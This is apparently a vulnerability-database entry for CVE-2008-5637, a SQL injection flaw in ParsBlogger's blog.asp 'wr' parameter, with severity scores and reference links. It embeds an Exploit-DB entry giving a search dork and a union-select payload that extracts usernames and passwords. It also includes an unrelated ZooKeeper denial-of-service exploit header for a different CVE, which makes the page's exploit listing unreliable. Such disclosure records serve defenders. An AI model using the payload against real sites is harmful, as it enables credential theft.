CVE-2008-5637
Published 2008-12-17
CVE-2008-5637: SQL injection vulnerability in blog.asp in ParsBlogger (Pb) allows remote attackers to execute arbitrary SQL commands via the wr parameter.
Priority P345 · high · 7.5 (CVSS 2.0)
AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 1.99% (78.2th percentile)
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| parsblogger | parsblogger | — | — |
No detection rules found.
Exploit-DB
Zookeeper 3.5.2 Client - Denial of Service
exploitdb·2017-07-02
CVE-2017-5637 Zookeeper 3.5.2 Client - Denial of Service
---
#!/usr/bin/python
# Exploit Title: Zookeeper Client Denial Of Service (Port 2181)
# Date: 2/7/2017
# Exploit Author: Brandon Dennis
# Email: [email protected]
# Software Link: http://zookeeper.apache.org/releases.html#download
# Zookeeper Version: 3.5.2
# Tested on: Windows 2008 R2, Windows 2012 R2 x64 & x86
# Description: The wchp command to the ZK port 2181 will gather open internal files by each session/watcher and organize them for the requesting client.
# This command is CPU intensive and will cause a denial of service to the port as well as spike the CPU of the remote machine to 90-100% consistently before any other traffic.
# The average amount of threads uses was 10000 for testing. This should work on all 3.x+ versions of Zook
Exploit-DB
ParsBlogger - 'blog.asp' SQL Injection
exploitdb·2008-11-26
CVE-2008-5637 ParsBlogger - 'blog.asp' SQL Injection
---
[~] Script : ParsBlogger
[~] Version : >!<
[~] Link : http://www.parsblogger.com
[~] Dork : "Powered by ParsBlogger"
[~] Author : BorN To K!LL
[~] TeaM : Security Geeks [ Sec-Geeks.com ]
[~] Exploit :.
site.ir/blog.asp?wr=[SQL]
[~] Example :.
site.ir/blog.asp?wr=-5+union+all+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13+from+writer--
[~] Greetings :.
[ Är ĦλCКΣΓ ] , [ SECURITY GΣΣKS ] , [ AsbMay's Group ] , [ w4ck1ng TeaM ] , [ darkc0de TeaM ] , [ Juba ] .. n all muslims
# milw0rm.com [2008-11-26]
No writeups or analysis indexed.
http://securityreason.com/securityalert/4778
http://www.securityfocus.com/bid/32488
http://www.vupen.com/english/advisories/2008/3270
https://www.exploit-db.com/exploits/7239
2008-12-17
Published